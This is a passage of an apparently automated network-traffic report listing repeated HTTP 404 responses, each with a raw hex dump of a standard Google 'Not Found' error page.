64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:41 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:43 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:44 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:45 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:45 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:45 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 